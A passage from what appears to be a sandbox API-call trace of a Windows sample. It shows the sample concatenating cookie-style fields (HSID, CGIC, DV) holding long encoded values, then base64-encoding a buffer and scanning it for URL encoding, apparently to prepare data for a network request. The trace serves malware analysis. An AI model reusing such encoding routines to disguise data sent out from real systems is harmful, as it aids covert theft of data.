(lpString="rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D") returned 366 [0143.798] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;", lpString2="DV" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV" [0143.798] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV", lpString2="=" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=" [0143.798] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=", lpString2="rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D" [0143.798] lstrcatA (in: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D", lpString2=";" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;" [0143.798] GetProcessHeap () returned 0x440000 [0143.798] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caf2a0 | out: hHeap=0x440000) returned 1 [0143.798] GetProcessHeap () returned 0x440000 [0143.798] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0143.798] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.799] CryptBinaryToStringA (in: pbBinary=0x2caf190, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f67c | out: pszString=0x0, pcchString=0x14f67c) returned 1 [0143.799] GetProcessHeap () returned 0x440000 [0143.799] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2ca9e30 [0143.799] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.799] CryptBinaryToStringA (in: pbBinary=0x2caf190, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2ca9e30, pcchString=0x14f67c | out: pszString="yDGNghH7ddRuBJtNp/o1T4o/JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pcchString=0x14f67c) returned 1 [0143.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.799] lstrlenA (lpString="yDGNghH7ddRuBJtNp/o1T4o/JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==") returned 344 [0143.799] GetProcessHeap () returned 0x440000 [0143.799] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x175) returned 0x2caf2a0 [0143.799] StrCSpnA (lpStr="yDGNghH7ddRuBJtNp/o1T4o/JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 17 [0143.799] StrSpnA (psz="/o1T4o/JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.799] StrCSpnA (lpStr="o1T4o/JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 5 [0143.799] StrSpnA (psz="/JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.799] StrCSpnA (lpStr="JbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", lpSet="+/=") returned 70 [0143.799] StrSpnA (psz="/JNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9/3G+NPk+TmHr9/ZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ/aF7tCdGnaeQL5u58+OBql0O3MMYb720Cf0+XjjLw2aq7zxg/fbKzWY7OOhd0QKQVWWvwIgYai01wKQ+iCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g==", pszSet="+/=") returned 1 [0143.799] StrCSpnA 